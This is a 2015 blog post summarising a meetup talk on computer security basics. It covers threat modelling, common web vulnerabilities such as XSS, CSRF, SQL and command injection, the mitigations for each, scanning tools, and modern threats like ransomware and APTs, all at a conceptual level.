Computer #Security Basics – Lessons from a Paranoid
Posted on June 19th, 2015
06/17/2015 @ Yahoo, 229 West 43rd St, 10th floor, NY
With recent high profile system attacks on businesses (such as EMC) and the U.S. government, this talk is very timely. One of the attack methods (XSS) in this presentation was recently revealed to be a vulnerability of a commonly used WordPress plugin.
- Thinking about attacks and responses
- Common web vulnerabilities
- Tool to improve security
- Modern attacks
- Thinking about threats
- Analyze security from the attacker’s perspective
- Map the system
- What are the trust boundaries
- Assets that the attacker might be interested in
- Who interacts with the system
- Trust level – who has what access rights
- Types of attacks: Spoofing – pretend to be someone else, etc.
- Assess the level of risk by each type of attack : e.g. likelihood x impact and the costs, etc.
- Consider range of mitigants : do nothing –vs– transfer risk –vs– mitigate –vs– terminate the server
- Common web vulnerabilities
- Cross Site Scription (XSS) – embed JS in a social message; Mitigant – use frameworks: e.g. convert < into “<” have a content security policy so an HTTP header is only allowed access to some resources: limit use of JS and CSS.
- Cross Site Request Forgery (CSRF) – confused deputy problem; can steal money from banks and more; can be used as a HTTP post as well as an HTTP get (for clickable images); Mitigant – all forms have nonce/token (hidden token sent as part of an input tag from a bank, which is needed to complete a transaction); use frameworks protection; don’t allow GET to change state (need a POST); short cookie expiry time
- SQL Injection – adjust a SQL query so that the query executes not only the response, but any additional code such as a “Where” statement that always tests “true” . NOSQL is also vulnerable; Mitigant – parameterize queries and programmatically extract and insert a string as the password; use stored procedures within DB; escape the user-supplied input to filter out “=” for example; be explicit about allowable types such as forcing a response to be a string.
- Command injection (Stuart considers this potentially to be the most damaging attack). Here, a web page takes the input and executes a command. This means that an attacker can insert additional commands after the required input. Mitigation – use the actual command, not the user inputs; filter and escape all inputs so they are treated as arguments, not commands
- Forced browsing / improper authorization– use DirBuster a tool for brute forcing urls to get to a monitoring panel; Mitigation – proper authorization also non-guessable resource IDs and passwords.
- Exposed Services – Mitigation – scan the network (including printers, cameras) to see if they hold viruses that can jump to the network; set up Jenkins Servers to avoid a backdoor for command injection; password protect everything
- Sensitive Data Exposure – a reset-password email contains a token, but this can make it possible for others to reset the password in the future; Mitigation – use transport encryption; identifiers should not be guessable; encrypt sensitive information (SSN); authenticating information should not be contained in return emails; only keep the logs you need since logs are often not protected, but may contain passwords, etc.;
Tool to improve security
- Static analyzers – look for potential problems
- Vulnerability scanners e.g. Nessus
- Spidering – follow all he links
- Network scanning e.g. Nmap – port scanning
- Fuzzing – feed garbage to a system and see what happens
- Social engineering – best way to protect is by getting everyone to be aware of vulnerabilities
- Finding, selling and exploiting 0day – attacking your browser, office software and phones;
- N-day botnets; take recent attacking methods and replicate them across the net
- Ransomware – “will tell the FBI about ___ unless you send $$$$”
- Advanced Persistent Threats (APTs) – persistent on your network and be quiet.